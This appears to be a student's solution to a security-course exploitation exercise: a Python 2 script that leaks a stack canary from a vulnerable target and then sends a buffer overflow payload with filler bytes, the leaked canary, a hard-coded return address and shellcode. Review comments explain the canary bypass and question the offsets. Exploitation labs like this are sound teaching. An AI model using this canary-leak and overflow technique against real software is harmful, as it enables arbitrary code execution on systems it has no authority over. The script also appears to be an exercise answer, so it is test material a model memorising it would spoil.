                                
                                    ### YOUR CODE STARTS HERE ###
# Two-stage script: first read the stack canary back out of the target's
# reply, then send an overflow payload that re-supplies the same canary ahead
# of the return address. A canary only protects the frame while its value
# stays secret; once the program echoes it, the check passes.
# `p` (the connection to the target) and `SHELLCODE` are not defined in this
# excerpt and must come from the surrounding template.
# NOTE(review): Python 2 only -- str.encode('hex') and ord() over str
# characters below do not work on Python 3 bytes.
# NOTE(review): every address is hard-coded (the comments suggest they were
# read from a debugger), so this presumably only holds while the target's
# stack layout is identical on every run -- confirm.
# CANARY @ 0xbffff708
# Example send:
# Probe: 12 'B' bytes, then a literal backslash and 'x' ("\\x" is two
# characters, not a hex escape), then a newline.
p.send('B' * 12 + "\\x" + '\n')
#full_canary = p.recvline()
# Fixed-length read of 17 bytes; presumably chosen over recvline() because the
# reply can contain raw bytes that line splitting would cut short -- confirm.
full_canary = p.recv(17)
print(full_canary)
# Drop the first 13 bytes of the reply and keep the remainder as the canary.
# NOTE(review): the original comment described this as removing "the 13th
# byte, always '\\x\n\0'"; the slice actually removes a 13-byte prefix, and
# what that prefix holds depends on how the target echoes the probe -- confirm.
canary_stripped = full_canary[13:]
# On Python 2 (without print_function) this prints a tuple, so non-printable
# canary bytes show up as escapes.
print("Canary:", canary_stripped, len(canary_stripped))

# c.buffer at 0xbffff6f4 (ends at 0xbffff704)
# eip stored at 0xbffff710
# Little-endian encoding of the address that will overwrite the saved eip.
rip = '\x14\xf7\xff\xbf' # 0xbffff714

## Format the fucking canary
# Debug view only: each canary byte as two hex digits, colon-separated.
sp = ":".join("{:02x}".format(ord(c)) for c in canary_stripped)
print(sp)

# Hex-encode the canary, then decode every two-digit pair back to a character.
# This is a round trip: hex_format ends up byte-for-byte equal to
# canary_stripped; only hex_can (printed above the loop) is new information.
hex_can = canary_stripped.encode('hex')
print(hex_can)
hex_format = ''
for i in range(0,len(hex_can),2):
    hex_format += chr(int(hex_can[i:i+2],16))
##
# Payload order: one NUL byte, 15 'A' filler bytes, the leaked canary, 4 'B'
# filler bytes, the replacement return address, SHELLCODE, and a newline.
dat_string ='\x00' + 'A' * 15 + hex_format + 'B' *4 + rip + SHELLCODE + '\n'
print (dat_string)
p.send(dat_string)
# The bare string literal below is the template's leftover hint text; as an
# expression statement it has no effect at runtime.
'''
# Example receive:
assert p.recvline() == 'testA'

# HINT: the last line of your exploit should look something like:
#   p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
# where m, canary, n and rip are all values you must determine
# and you might need to add a '\x00' somewhere
'''
### YOUR CODE  ENDS  HERE ###
                                
                            
